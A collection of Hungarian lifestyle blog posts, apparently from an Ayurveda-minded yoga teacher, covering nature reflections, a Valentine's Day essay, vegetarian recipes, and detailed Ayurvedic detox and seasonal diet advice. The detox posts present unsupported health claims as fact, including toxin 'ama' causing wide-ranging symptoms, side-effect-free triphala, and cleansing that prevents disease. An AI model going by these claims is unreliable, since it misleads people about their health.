A természet állandóan változik... ettől a megszokott hellyel való találkozás is mindig várakozással és izgalommal tölt el... örök szerelem, ami folytonos izzásban tart... egy soha nem szűnő szenvedély... Ugyanott állsz , de más mint tegnap... néhányan virágbaborulva várják a napsugarak meleg?t, vannak akik szirmaikat hullatva készülnek a visszavonulásra... a látvány, az illatok, a hangok, a szél simogatása a bőrömön... m?g a talaj erintése is ahogyan érintkezik a talpammal más és más időjárástól, növényzettől függően... Az akác a végét járja, de a bodza, a fenyők mézédes gyantája, a fehér virágú bokrok méheket csalogató illata új , élvezetes , boldogító érzéseket kelt az erdőjárókban. Az egyre zöldebb táj, a mákvirágzás látványa, a harangvirág csodás lilája, az erős napsütésben csillogó víztükör és sziklák látványa ámulatba ejt... újra és újra.... Nem lehet betelni az érzéssel, ahogy a természet lágy, zöldellő, puha karjaival körülölel... S hogy mi a titok tapasztalni ezt a végtelen gyönyörökkel teli szerelmet? A tudatos jelenlét ... ott lenni a pillanatban, megtapasztalni minden aspektusát... s így a részeddé válik, eggyé olvadsz a létezéssel, az illatokkal, az érintéssel, a látvánnyal... veled marad a végtelen csoda és mindig veled lesz... Ne siess... lassíts le... légy jelen a pillanatban... tudatosítsd az érzéseidet, tapasztalataidat, testérzeteidet és mindig tapasztalhatod a boldogságot, a létezés varázsát. Sok csodás tapasztalatot kívánok:) szerettel Kati
Lemenő napkorong az Ég és a Föld találkozásánál
2022. május 21. Élj harmóniában
Lemenő napkorong az Ég és a Föld találkozásánál, lágy szellő, mézédes akác illat, lágyan lengedező fűszálak, tücskök koncertje, a távolból kakas kukorékolás... a hely ahol élek, Budapest egy csodás szeglete... S lassan sötét lesz, kezd elhalkulni a város, minden pihenni tér, s a kék paplan, mely betakarja a várost megannyi felhőjével és fénylő csillagával álmunkat vigyázza. Az elcsendesedésben ott van a tudat, hogy ez a sötét, mely most mindent beborít, s biztosítja a pihenést, a visszavonulást, holnap szertefoszlik a felkelő nap fényében és új reményeket, varázslatokat, bámulatos meglepetéseket hoz mindenkinek .
Tisztítás, tisztító kúra, méregtelenítés
2022. május 5. Élj harmóniában
Tisztítás, tisztító kúra A nem megfelelő életmód, nem megfelelő táplálkozás, rossz emésztés, nem megfelelő gondolkodás mind salakanyagokat tud felhalmozni a szervezetedben. Ezt a salakanyagot ájruvédában ,,amanak hívják. Az ama felhalmozódásának jelei, energia hiány, lepedék a nyelven, rossz emésztés (puffadás, savasodás, böfögés, gyomorégés, székrekedés, hasmenés vagy ezek váltakozása, kellemetlen bélmozgások) étkezés utáni elnehezültség érzés, nyálkás széklet (azaz nyomot hagy) ízületi és izomfájdalmak, tompa gondolkodás, rossz közérzet, lustaság, motiválatlanság, koncentráció zavar, alvás zavar, szorongás, a testváladékok rossz szaga - vizelet, széklet, izzadság, akár elszíneződött foltot is hagy, amikor úgy érzed semmi nem igazán jó ízű, nem tudod élvezni igazán az étkezéseket, illetve amikor állandóan összevissza kívánsz mindenféle dolgokat. Akármilyen jól étkezel, figyelsz az egészségedre, jógázol, néha így is felhalmozódnak salakanyagok a szervezetben. Annak érdekében, hogy a szervezetedet megújítsd, megelőzd az esetleges betegségek kialakulását jó, ha időközönként megtisztítod a szervezetet a méreganyagoktól. Egy jó kis tisztítás hatására, megszabadulhatsz fájdalmaktól, emésztési problémáktól, közelebb kerülhetsz az ideális testsúlyhoz, megfiatalítod a tested szöveteit, javul a koncentrációd, a gondolkodás, könnyedebbnek és felfrissülttebnek, energikusabbnak, motíváltabbnak fogod érezni magad és erősödik az immunrendszered. Továbbá újra jó lesz az étvágyad és élvezni fogod az ízeket:) Az ájruvédikus tisztítás kiegyensúlyozza és harmonizálja a doshákat is (váta, pitta és kapha). Az ájruvédában többféle tisztítást különböztetünk meg. A teljes nagy tisztítását Panchakarmának hívják, amelyet ájurvéda klinikákon, orvos által, az egyénileg megállapított egyensúlytalanságok alapján, képzett ájurvéda technikusukkal lehet elvégezni. A tisztításnak egy egyszerűbb, de rendkívül hatékony változata az otthoni tisztítás. ehhez a beszerzendő dolgokat egy korábbi bejegyzésben már megírtam nektek. Előre határozd el, hogy ezt szeretnéd csinálni. Jelöld ki ,2,3 5,7 napot vállasz be a tisztításból ez rajtad múlik:) A tisztítás ideje alatt pihenj sokat, sem fizikálisan, sem mentálisan nem ajánlott a túlterhelés. Ne stresszes időszakban akarj belevágni. Menstruációnál sem szabad tisztító kúrába kezdeni. A tisztítás első része, hogy hagyj fel a további méreganyagok felhalmozásával. Erről írtam a minap a csoportba. *Forralt víz * A tisztítás fontos része, hogy forró vizet és forró méregtelenítő teákat kortyolj a nap során. A forró víz felpörgeti az emésztést, és segít természetesen kiüríteni a méreganyagokat a szervezetedből. A készítését a blogon megtalálod és készíthetsz gyógyteákat is fűszerekkel, a kömény, koriander, édeskömény és friss gyömbér. *Kitchari* A tisztítás másik pillére egy mono diéta, a Kitchari nevű ételen alapul. A tisztító kúra alatt reggelire, ebédre és vacsorára is Kitchari-t fogyasztunk. Ez baszmati rizsből és mund dhalból készült, könnyen emészthető, teljes értékű, tápláló és tisztító tulajdonságokkal egyszerre rendelkező étel. Ez az egyik legkönnyebben emészthető étel és ennek köszönhetően lehetővé teszi, hogy az emésztőrendszered pihenjen és vissza tudjon állni normál működésre, felerősödjön az emésztésed ereje, az agni-d és így segít elégetni a méreganyagokat a szervezetedben. A tápláló hatsának köszönhetően amíg ezt fogyasztod, nem csak a felhalmozódott salakanyagoktól tudsz megszabadulni, de csodálatos táplálásban részesíted a szöveteidet is. Készíts kitcharit minden nap frissen, emésztést serkentő fűszerekkel a receptet a blogon megtalálod. A kész ételhez adj egy picit ghít is, ez segít a mérgek kioldásában. Tálalhatod pici lime-mal, friss korianderrel is. Kerüld a nassolást, hagyj legalább 5 órát az étkezések között. Ha nincs elegendő idő két étkezés között, nem tudja a szervezeted feldolgozni a salakanyag raktárakat. *Olajos önmasszázs* Ez egy csodás dolog, én szinte minden reggel csinálom:) Nem csak táplálja tested szöveteit nyugtatja az elméd, fiatalító hatású, kényeztet, de a méregtelenítési folyamatban is jelentős szerepe van, mert mobilizálja a szövetekben lerakódott mérgeket. Reggel vagy este a zuhanyozás előtt melegíts fel ájurvédikus masszázsolajat egy kis edénybe és azzal masszírozd át a tested. Én szoktam otthon is készíteni ájruvéda masszázsolajat, azzal hogy a szezámolajat megérlelem (100 fokra hevítem és lekapcsolom) .A masszázshoz is teszek ki linket a blogról:) *Triphala* Gyógynövényes rásegítés. Az ájurvédikus tisztítás fontos része a Triphala készítmény, amely nagyon gyengéden, mellékhatások nélkül távolítja el a salakanyagokat a testedből. Ez a csodás gyógynövény készítmény segíti a rendszeres székletürítést és megfiatalítja a sejteket. Este lefekvés előtt meleg vízzel vegyél be 2-4 tiphala tablettát, vagy 1/2 -1 tk. triphala port. * Tisztítás alatt ajánlott napi rutin* - Korai ébredés - Nyelvtisztítás, olajrágás - Meleg víz fogyasztás és ez egész nap folyamatosan - Olajos önmasszázs - Zuhanyozás - Jógagyakorlás - Kitchari készítés az adott napra - Reggeli (7-8 óra között) - Ebéd (12-13 óra között - Vacsora (17-18 óra között) - Este Triphala bevétele - Korai lefekvés (22 óráig) A tisztítás alatt lehet lesznek nehezebb időszakok akár érzelmileg, akár testileg, de ez hamar elmúlik. Az érzelmeket figyeld meg és engedd el, de e ragadj bele semmibe A tisztítás alatt próbálj többet elcsendesedni, befelé figyelni, pozitív dolgokkal foglalkozni. Minimalizálja a stresszt, a találkákat, a pörgést, a képernyőhasználatot. Pihenj sokat, ez segít abban, hogy a szervezeted a legtöbb energiát a tisztításra tudja fordítani. *Tisztítás után* Először gratulálok élvezd a változást, a tisztítás fantasztikus hatásait, a könnyedséget, a jó emésztést, jó étvágyat, örömteli pillanatokat, jó memóriát, inspirációt. Tisztító kúra után lassan, lepésről lepésre vezess vissza csak régi szokásokat, ne terheld túl a szervezeted. Ha lehet a jó szokásokból tarts meg minél többet Kerüld tisztítás után közvetlenül a hús, hal, tojás, tejtermékek, búzafélék fogyasztását. Várj néhány napot. Jó kis megtisztulást kívánok:) szeretettel KAti #megújulás #tisztítás #tisztítókúra #ájurvédikustisztítás #ájruvéda #ájurvédikus #kitchari #monodiéta #egészségmegprzés #tavaszitisztítás
Szárzeller krémleves pirított kelbimbóval
Tavaszi gourmet leves alig hozzávalókból
Görgess csak lejjebb a hozzávalókhoz, nézd meg őket, aztán gyere vissza ide. Várlak! ;)
Na. Nem hiányzik valami? Hol vannak a fűszerek? Az a vicc, hogy nem kell. A szárzeller üdesége összesimul a napraforgómag testességével, és az egészet az édes-mustáros kelbimbó koronázza.
Ha nagybetűs ÉTEL-re vágysz, akkor ilyet csinálj. Használj valódi alapanyagokat. Milyen az, amikor mosolyog az ételed? – Amikor te is önkéntelenül visszamosolyogsz rá. Hát, így örültem én ennek a levesnek.
Tavasz, új kezdet, újjászületés
2022. március 15. Élj harmóniában
Újra beköszönt a tavasz, ami a téli visszavonulás után a megújulás, újjászületés az új kezdetek ideje. Idén a tél nem volt túl hideg, szerencsére nagyon sok volt a napsütéses órák száma és úgy tűnik a tavasz is korábban kezdődött. Már hosszú hetek óta hallom az énekesmadarak tavaszi csivitelését, a fákon bimbók kezdenek nyílni, az illatok egyre intenzívebbek és február utolsó napjaiban már nem csak hóvirágot, de ibolyát is láttam. Ahogy minden nap korábban kel a nap és később megy le, ahogy melegszik a levegő, ahogy látom éledni a természetet, minden porcikámmal érzem a tavasz friss megújító energiáit. Az időjárás egyre kedvezőbb, így a téli bezártság után minél több időt tudsz kint tölteni a szabadban, sétálni, kirándulni. Ez segít, hogy kapcsolatba kerülj a természettel és önmagaddal. A természetben is láthatod, ahogy az idő melegszik úgy emelkedik a talajvíz, hogy a talaj megtisztulhasson a fölös salakanyagoktól. Az állatok is levetik téli bundájukat és tavasszal az emberi szervezet is megújul. A szervezetünk is próbál ilyenkor a felgyülemlett salakanyagoktól megtisztulni. A természetben minden körforgásban van és ahogy a tél nem kedvez a vetésnek, de ideális a visszavonulásra, a tavasz a megújulás ideje. Ilyenkor az emberi test szövetei is képesek megújulni, megfiatalodni. Az ájruvéda egyik lényege, hogy igazodjunk a természet ritmusához és támogassuk szervezetünket a megújulás folyamatában. A tavasz a legjobb időszak arra, hogy kitisztítsd a régit, teret adj az újnak, a jövőnek, a növekedésnek, fejlődésnek. Ha kész vagy elengedni, megválni a régitől és elég kíváncsi és bátor befogadni az újat akkor részed lesz a megújulásban, újjászületésben. Igazodj Te is a természethez és használd ki a tavaszi időszak nyújtotta lehetőségeket. Táplálkozás A téli táplálkozás fontos elem volt, hogy tápláló ételeket egyél, amik segítenek a testet szigetelni a hideg ellen. Tavasszal viszont válts könnyű, egyszerű, tiszta minőségű étrendre. A tavaszi étrend lényege a télen lerakódott salakanyagoktól megszabadulni, csökkenti a nedvességet, nyálkát a szervezetben. Természetes ha tapasztalod, ahogy beköszönt a melegebb időjárás csökken a vágyad a nehezebb, tartalmas ételek iránt és inkább könnyedebb ételekre vágysz, elképzelhető, hogy néhány napig étvágyad sem lesz. Esetleg elkezded kívánni a - zöldségeket, friss salátákat, gyümölcsöket. Annak érdekében, hogy ne kelljen betegségektől, nehézségérzettől, fáradtságtól, nyálka felhalmozódástól szenvedned - nátha, influenza, allergia - a tavaszi időszakban, csökkentsd a szervezetedben a nedvességet, válts szárító és melegítő étrendre. Néhány tanács, a tavaszi étrendhez - Tavasszal érdemes több csípős, keserű és fanyar ízt vinni a táplálkozásodba. - Próbáld ki a húsmentes étrendet - a hús nagyon elnehezíti a tested. A fehérjét kiválóan pótolhatod gabonafélék és hüvelyesek kombinációjával. (pl lencsefőzelék zsemlével, falafel vagy hummusz pita kenyérrel, babpüré kukorica tortillával, mungdhal baszmati rizzsel, csicseriborsó kuszkuszzal) - Ajánlott gabonafélék és hüvelyesek: baszmati rizs, köles, hajdina, kukorica, árpa, quinia, zab, mungóbab, csicseriborsó, vörös bab, lencse, adzuki bab, fekete bab. - Tavaszra ajánlottak: karfiol, brokkoli, káposzta, saláta, retek, spenót, spárga, borsó, sárgarépa, zeller, zöldbab, cékla, cikória, eper, áfonya, alma. - A zsíros dióféléket kerüld, de érdemes 1-2 ek. napraforgómagot és tökmagot pirítva bevezetni az étrendedbe. - A nap folyamán fogyassz meleg vagy langyos vizet, gyógyteákat és kerülj minden hideg folyadékot. - Az ételeket emésztést segítő, melegítő, nyálka mentesítő fűszerekkel készítsd el gyömbért, fekete borsot, fahéjat, kurkuma, szegfűszeg, kardamom, hosszúbors. - Ha reggel nem vagy éhes, hagyd ki a reggelit. Ha éhes vagy ne egyél nehezet. Kiváló a zabkása, rizskása. - Ebédre és vacsorára főzz gabonaféléket, párolt zöldségeket és hüvelyeseket. - Próbálj minél több frissen készült ételt fogyasztani. Van néhány olyan táplálkozási szokás, amit érdemes kerülni, mert nyálka felhalmozódáshoz vezet - Kerüld az édességeket, félkész ételeket, gyorsételeket, fagyasztott dolgokat, másnapos ételeket, húst, kenyereket, tejterméket, dióféléket, zsíros ételeket, olajba kisült fogásokat és a hidegen fogyasztható dolgokat (fagylalt, joghurt, etc.) - Érdemes kiiktatni az étrendből a nehéz vagy vizes zöldségeket - avokádó, paradicsom, uborka, cukkini, tökfélék. - Ne nassolj étkezések között - Ne edd túl magad. - Minimalizáld az édes, savanyú és sós ízeket. - Érdemes lecsökkenteni a nehezebben emészthető, vizes és a savanyú gyümölcsök fogyasztását, a narancs, banán, kókusz, dinnye, ananász, füge, datolya. - Kevesebb zsiradékot használj a főzéshez. A főzéshez a ghí (tisztított vaj) a legkiválóbb. Esetleg fontold meg egy kis tavaszi méregtelenítő, tisztító kúra elvégzését. Tarthatsz húsvéti böjtöt is vagy lehet akár léböjt - pl egész nap csak forralt vizet iszol, vagy kiegészíted gyümölcslével, zöldséglével vagy kiváló a monodiéta. Jómagam az ájruvédikus kitchari kúrát tartom a legjobb tisztítókúrának. A méregtelenítésről a blogomon részletesen olvashatsz. Életmód Érdemes az életmódbeli szokásaidat is a tavasz hangulatához igazítani. Alakíts ki egy napi rutint - Ahogy a nap korábban kel, kezdj el Te is kicsit korábban kelni. Legkésőbb 6- 7 óráig kelj fel. - Ébredés után tisztálkodj - A tisztálkodás után végezz könnyed testmozgást. Akár csak mozgasd át az ízületeket, izmokat - nyak, váll, karok, gerinc, csípő, térd, boka - és végezz néhány nyújtózást, testgyakorlatot. Jógaoktatóként leginkább a jógagyakorlatokat preferálom, de a tai chi vagy bármilyen akár könnyedebb torna is jó lehet. - Végezz légzőgyakorlatokat, segítik a méregtelenítést, energetizálnak és helyreállítják a test-lélek-elme harmóniáját. - Nappal ne feküdj le aludni, nyálkafelhalmozódást és nehézségérzetet okoz a testedben és az elmédben. Az is így hat ha későn kelsz pl. reggel 9 kor ébredsz. - Este próbálj 22:00-ig lefeküdni aludni, de legkésőbb 23:00-ig kerülj ágyba. Az éjfél előtti lefekvéssel támogatod a tested méregtelenítő folyamatait, kipihentebb lesz az idegrendszered és szépülsz. Végezz rendszeres testmozgást - A mozgás aktiválja a keringésed, segít a méregtelenítésben, felpörget, hőt termel, könnyedséget hoz. - Ha sok fölös kilót szedtél fel a tél során, egy kicsit intenzívebb, megerőltetőbb mozgással könnyen megszabadulhatsz tőlük. Ha nincsenek fölös kilóid ne erőltesd túl magad. - Nagyon jók a séta, túrázás biciklizés, kocogás, úszás, jóga, thai chi. - A testmozgás legjobb időzítése reggel 6 és délelőtt 10:00 között vagy 18:00-20:00 között. - Ha jógát gyakorolsz részesítsd előnyben a nagyobb izommunkát kívánó pózokat és a mellkasnyitó gyakorlatokat. Néhány példa: napüdvözlet, hősi póz 1. és 2. , trikónászana, kobra, íj, teve, gerinccsavarások. A gyakorlás végén végezz relaxációt. A tavaszi frissességet használd ki az élet más területein is. A téli begubózás után kezdj el programokat szervezni, többet eljárni otthonról. Sétálj, kirándulj, menj színházba, táncolni, koncertekre. A tavasz jó időszak a szocializálódásra is, új kapcsolatok kialakítására, régi kapcsolatok újjáélesztésére. Találkozz a barátaiddal. Próbálj ki valami új dolgot, tanulj valamit újat, kezdj bele valami újba. Gondold át az életed, tűzz ki új célokat, akár az életmódoddal, táplálkozásoddal, egészségeddel, karriereddel, családoddal, önismerettel, spiritualitással, személyiségfejlesztéssel kapcsolatban. Selejtezz! Szabadulj meg a régitől, hogy helyet csinálj az újnak. Nézd át mely dolgok, amiket nem használsz, nincs rá szükséged, illetve mik azok a dolgok, amik kifejezetten rossz érzéseket, emlékeket hoznak elő. Az ilyen dolgoktól ajánlatod megválni. Vedd sorra tudatosan az emberi kapcsolataidat is. Amik úgy érzed nem válnak javadra, viszik az energiáidat, rossz érzéseket okoznak esetleg gondold át a felszámolásukat, vagy az érintkezési felületek csökkentését. Csinálj tavaszi nagytakarítást és esetleg újítsd meg kicsit a lakást. Festés, átrendezés, textílfestés, hímzés, rajzok, matricák, néhány új dolog - díszpárna , fogantyú, szappantartó, etc. - megannyi kreatív megoldással tudod feldobni kicsit az otthonodat. Változtass az öltözködéseden. Már hetekkel ezelőtt mondtam a férjemnek elég a téli ruhatáramból, és elővettem a színesebb ruháimat. Öltözz élénk színekbe, sárga, piros, narancs, pink, kezdj lágyabb anyagokat hordani. Csinálj időt, teret, helyet a lelki (spiritulis) dolgoknak. Minden nap szánj időt a befelé figyelésre, a saját érzéseid, gondolatid tudatosítására, imádkozásra. Adj hálát mindazért, amid van, amit elértél. Olvass szentírást ( Bhagavad Gíta, Biblia, etc). A tavasz a szabadságról és az örömről is szól. A legtöbb ember ma a saját maga emelete falak között él, saját börtönében. A társadalomban megannyi szív és érrendszeri betegség, mert az emberek nem mernek a szívük szerint élni. Nem szánnak időt a befelé figyelésre, a legtöbben nem is tudják szívük szerint mit csinálnának. Itt a lehetőség, hogy változtass, többet figyelj befelé. Akár írj listát arról mi az, amit szívesen csinálsz, ami neked örömet okoz és tudatosan a munka, szórakozás, pihenés arányát hozd egyensúlyba. Csinálj sok olyan dolgot, ami neked örömet okoz, ami a szíved szerinti. Ez egy ideális időszak arra, hogy merj önmagad lenni, merj a szívedre hallgatni. A tavasz megújító ereje nem csak testi szinten mutatkozik meg, de fontos ilyekor az életünk minden olyan területét szemügyre venni, ahol elakadásaink vannak, beleragadtunk a régibe, akár régi élethelyzetekbe, berögzült viselkedési mintákba, nem tudunk továbblépni, blokkok vannak. Érdemes átgondolni ezeket a kérdéseket és tudatosan megújulni ezen területeken is. A tavasz ideális a szerelemre, a párkapcsolatunk elmélyítésére, a szexuális aktivitás fokozására is. Ha még nincs párod, tavasszal a természet rezgései, a hormonok működése, minden támogatja a szerelem megérkezését az életedbe. A tavasz a legcsodásabb évszak, a maga friss, megújító, növekedést hozó erejével. Ahogy a természetben is minden kizöldül, virágba borul, úgy tudod az életedet Te is virágba borítani, ha megragadod a pillanatot, a tavasz adta lehetőségeket. Fantasztikus megújulást és sok örömet kívánok Neked! szeretettel Vitai Katiwww.eljharmonaiban.huhttp://eljharmoniaban.blogspot.com/
Egészségmegőrzés februárban - aktualitások
2022. február 18. Élj harmóniában
Február van... sorra jönnek az ismerősök és a tanulóim fáradtak, folyik az orruk, megfáztak... Az ájruvéda több ezer éves tudással és tapasztalattal rendelkezik a világ hatásairól. Ha Te is megfigyeled a természetet február a tisztulás ideje, a természet átáll téli üzemmódról a nyári időszak előkészítésére. A talajvíz megemelkedik, mert a talaj a fölösleges tél folyamán felgyűlt csapadékot, hólevet, etc. kidobja magából . Az állatok is levedlik a téli bundájukat. A nap korábban kel és később fekszik. Ilyenkor a tested is elkezd a téli szigetelő zsírok felépítéséről átállni, és a zsírban elraktározott lerakódásoktól megszabadulni, kioldja a salakanyagokat. Amikor a tested elkezd méregteleníteni, tapasztalhatsz fáradtságot, néhány hétig étvágytalanságot is. Ahogy a salakanyagok a vérbe kerülnek, hatást gyakorolnak a vér sűrűségére és terhelik a májad. Tapasztalhatsz lelassultságot, fáradtságot, fázékonyságot, és máj érzelmeket - frusztráció, keserűség, depi, kritika, elégedetlenség. De ne aggódj ezek elmúlnak, ahogy megyünk a tavaszba. Ha túl sok salakanyag, nyálka van a szervezetben , akkor attól szabadulni szeretne a szervezeted, így orrfolyást, megfázásos, influenza szerű tüneteket is érezhetsz. Ezt megelőzendő, jó ha elkezded támogatni a test méregtelenítő folyamatait. Mit tehetsz? Fő szabály, ha nincs étvágyad ne egyél, nyugodtan hagyj ki egy egy étkezést. Az étvágy elveszítése szezonális. Érdemes ebben az időszakban szárító és melegítő, könnyű ételeket fogyasztani, gabonák, párolt zöldségek hüvelyesek. Lentebb részletezem is. Kerüld a húst, a nyálkásító ételeket, gyümölcsöket, tejterméket, élesztős dolgokat, édességeket és a zsírokat. A tavaszi böjtök segítenek megtisztítani a szervezeted a sok felgyűlt salakanyagtól és megszabadulhatsz a télen feljött fölös kilóktól. Nem véletlen, hogy minden ősi kultúra összhangban a természettel, erre az időszakra időzített valamilyen böjtöt az egészségmegőrzés érdekében. A böjt kiválasztásánál, vedd figyelembe ájruvédikus alkatodat is. A böjtökről részletesen a blogon már írtam: http://eljharmoniaban.blogspot.com/2020/03/bojt-tehermentesites-meregtelenites.html Mozogj rendszeresen - séta, kirándulás, jóga, könnyű súlyokkal konditerem, a lényeg, hogy mozogj. Napközben ne feküdj le aludni. Este próbálj 22:00-ig elmenni aludni, mert a méregtelenítéshez szükséges , hogy időbe ágyba kerülj. Február, márciustól kevesebb alvással is kipihentebbnek érezheted majd magad. Ha feszültséget, frusztrációt, türelmetlenséget tapasztalsz segíthetnek keserű ételek. Használj kurkumát, mert segít javítani a keringést, tisztítja az ereket nyirokrendszert és harmonizálja a máj működését. Jó még a lepkeszegmag is. Ha hízásra hajlamos vagy és sok nyálka van a szervezetedben a csípős fűszerek segítenek megszüntetni a nyálka felhalmozódást. A gyömbér, feketebors kiváló választások. Szuper élelmiszer februárban cékla, jó még a répa, brokkoli és a káposztafélék is a salaktalanítás támogatására. A hüvelyesek is segítik a belek tisztulást februárban . pl. csicseriborsó, mungóbab. Ebben az időszakban szuper a hajdina és a rozs. A kenyérféléket kerüld inkább, mert nagyon nyálkásítanak. Ha az ételre csepegtetsz egy kis citromlevet az is segíti a zsírok bontását. Egy szuper kis recept mostanra hajdina céklás zöldségekkel: http://eljharmoniaban.blogspot.com/2016/02/ceklas-zoldsegek-hajdinaval.html Jó egészséget kívánok:) szeretettel KAti #ájurvéda #tél #méregtelenítés #február #szezonális #egészségmegőrzés
Február 14. Valentin nap
2022. február 14. Élj harmóniában
Február 14. Valentin nap Sajnos ahogy elnézem sokan hörögnek, morognak, úgy reagálnak rá, mintha azt mondanák nekik benzin áremelés lesz:) Ennek számos oka lehet, pl. szerelmi csalódás, fásultság, singliség vagy csak egyfajta duzzogás, elzárkózás attól, amit mások is csinálnak. Az lenne a jó ha az év minden napja szólna a szerelemről, a szeretetről, az Édesanyákról, a nőkről, környezetvédelemről, költészetről, etc.. .. Sajnos társadalmilag nem tartunk ott, hogy minden nap tudatosan, hálával gondoljanak az emberek akár a párjukra vagy a nőkre vagy éppen a környezetvédelemre... ezért vannak amolyan dedikált napok. Egy egy ilyen nap leginkább arra jó, hogy felhívja a figyelmet az adott téma fontosságára. Ilyenkor elgondokodhatunk... mit tehetek a párkapcsolatért, a társamért, a szerelm lángjának fenntartásáért Ha Te és a párod tudsz az év minden napján hálával és szeretettel gondolni a másikra, tudatosítod magadban minden nap miért szeretted meg őt, mik az ő különös kincsei, képességei, mit tisztelsz benne, mit szeretsz benne, hálás vagy azért hogy mellette hajthatod álomra a fejed és mellette ébredhetsz, ha meglepitek egymást apró dolgokkal, becsempészel néhány szerelmes verssort a kabátja zsebébe, ott várja egy szál virág az asztalon, beviszed neki a reggeli teát, elviszed kirándulni, piknikelni, vacsorázni, színházba ki mit szeret:) megleped valami aprósággal aminek örül és tudatosan figyeltek arra, hogy a kapcsolatotok jól működjön, megbeszélitek a dolgokat, nem őrizgettek magatokban sérelmeket, neheztelést akkor valóban mit nektek Valentin nap, hiszen minden nap ilyen az életedben.Az életedben minden aminek figyelmet szentelsz virágozni fog. Senki nem azért választ valakit társnak, hogy majd utáljanak egymás mellett élni és bosszantsák egymást. A szerelem olyan, mint egy mag.. elveted és öntözni gondozni kell, hogy virágozzon. Ha valaki nem gondoz egy kertet, ne csodálkozzon ha gazos lesz, bosszúságot okoz és nem gyönyörködhet benne... Sokan a szerelmet úgy gondolják, hogy házasság után, az már úgy van... Ahhoz hogy a szerelem virágozzon, a kapcsolat jól működjön szükséges energiát, időt, pénzt szánnod rá. Sikeres vagy a munkádban? mennyi időt, pénzt, energiát szántál arra, hogy az adott szakterületen sikeres legyél? Vajon hányan tesznek ugyanennyi energiát a szerelembe, a házasságukba is mint a szakmai karrierbe? Mennyi könyvet olvasol, hány képzést végzel el ahhoz és mennyit változtatsz a dolgaidban, hogy fenntartsátok a szerelmet, hogy jobb társ legyél, mennyi időt töltesz a kedveseddel csak rá koncentrálva? Sokaktól hallom ugyan mi nem érünk erre rá, meg nem költünk ilyenekre... sok sok ember nem ad teret, időt az életben a szerelemnek... gondolja ott van a sok feladat inkább arra koncentrál, na meg minek egy vacsora, új ruha (sok nő még rejtegeti is az új ruhadarabokat a férje elől) , kettesben töltött este még a gyerekekre vigyázást is meg kell oldani... valóban macera és pénz egy egy romantikus program vagy valamilyen ajándék.Sajnos a válás sokkal drágább dolog és érzelmileg nagyon megterhelő, mint lett volna egy egy szabadnap vagy hétvége kettesben, egy csinos ruha, egy szép fülbevaló, egy romantikus esti séta, egy Margitszigeti piknik vagy egy virágcsokor... Nincs az a nő aki a lelke mélyén ne örülne, ha a párja meglepi valamivel. Drága Urak... nem hallgatni arra, amikor a hölgy elsőre elutasító és morog... érdemes kitartó lovagnak lenni. Szóval ma Valentin nap van. Légy pozitív és lásd mindenben a jót, a mai nap egy lehetőség arra, hogy közelebb kerülj a szerelem érzéséhez, a párodhoz. Minden kapcsolatban vannak nehézségek, de ha tudatosan őrzöd a szerelmet, akkor könnyen átsegíthetitek egymást a nehezebb időszakokon is. Ha még nincs társad... akkor se búslakodj a mai napon:) Úgy örülj mások szerelmének, mintha a sajátod lenne. Lepd meg magad valamivel... egy szál virággal, egy marcipánszívvel, este nézegesd a csillagokat, bármi ami neked örömet okoz. Gondold át mit is szeretnél a párkapcsolat területén és csinálj az életedben helyet és időt egy szerelemnek. Nem az a lényeg, hogy párkapcsolatban élsz vagy egyedül. A mai nap egy lehetőség, hogy változtass... a gondolkodásodon, céljaidon, hozzáállásodon, az életedben a prioritásokon... Örömteli, szerelmes Valentin napot kívánok !szeretettelKati A kép Szinyei Merse Pál festménye, a Szerelmespár.
Egészben sült karfiol céklás burgonyapürével
2022. február 6. Mindennapi ételeink
Igazi lakoma, próbáljátok ki. Hozzávalók - a karfiolhoz: 1 kg megmosott karfiol 375 gr Dr. Oetker vega tejföl (vagy natúr joghurt, kefír) só, pirospaprika, fokhagymapor, szerecsendió, őrölt gyömbér - ízlés szerint Elkészítés: A karfiol leveleit leszedjük, és alaposan megmossuk. A szósz hozzávalóit alaposan összekeverjük. Kivágjuk a karfiol torzsáját, majd a töltelék kb 1/3-át, amennyit bele tudunk tölteni, belekanalazzuk. Ezt követően egy sütőpapírral bélelt tepsibe tesszük, rózsáival felfelé, és körbekenjük a tetejét is. Várunk 3 percet és a maradék szószt egy újabb rétegben rákenjük. Kicsit pihentetjük, majd 180 fokos , légkeveréses sütő közepes rácsára téve kb. 90 perc alatt kisütjük. Hozzávalók a céklás burgonyapüréhez: 60 dkg burgonya 20 dkg cékla só, bors, metélőhagyma - ízlés szerint növényi ráma - ízlés szerint növényi tej v tejszín - ízlés szerint Elkészítés: A céklát, burgonyát megmossuk, felkockázzuk. Sós vízbe tesszük, először a céklát, és amikor az félpuhára főtt, hozzáadjuk a feldarabolt krumplit is. Puhára főzzük. Leszűrjük, én ilyenkor szoktam adni hozzá egy kis rizs-vagy zabtejet, növényi rámát és krumplinyomóval összetörjük. A fotó miatt egy része kicsit lágyabb lett, jobban mutat rajta a karfiol ;-) A céklás burgonyapüré recept-ötlet az autós oktatómtól származik, aki feleségével együtt a vegetáriánus konyha híve. Bár már én is főztem így, vagy pl. sütőtökkel, édesburgonyával a burgonyapürét, de a céklára nemrég ő emlékeztetett. Köszönjük! :-D A tetejét megszórhatjuk pisztáciával, mandulával.
Müzliszelet-falatkák
2022. január 11. Mindennapi ételeink
Odavagyok a müzliszeletért, bár számomra túl édesek, ragadósak. Szerettem volna itthon készíteni amolyan granola bar-t. Nekem ízlett, a gyerekek is ettek belőle, bár nem vitték túlzásba ? Hozzávalók:10 dkg zabpehely10 dkg mandula / dió (olajos mag)10 dkg aszalt gyümölcs10 dkg csokiforgács (csokidarab)8 dkg méz5 dkg barnacukor8 dkg kókuszolaj1 ek. lekvár 2 ek. chiamag2 ek.lenmagpehely2 ek. teljesőrlésű lisztElkészítés:A kókuszolajat, mézet, lekvárt összemelegítjük, majd hozzáadjuk a többi alapanyagunkat (diót én most daráltam és vágtam is). Sütőpapírral kibélelt tepsibe teszünk kis gombócokat, amelyeket rudakká/félrudakká lapítunk és 170 fokon kb. 15-20 perc alatt kisütjük.
Vegán stollen
2021. december 27. Mindennapi ételeink
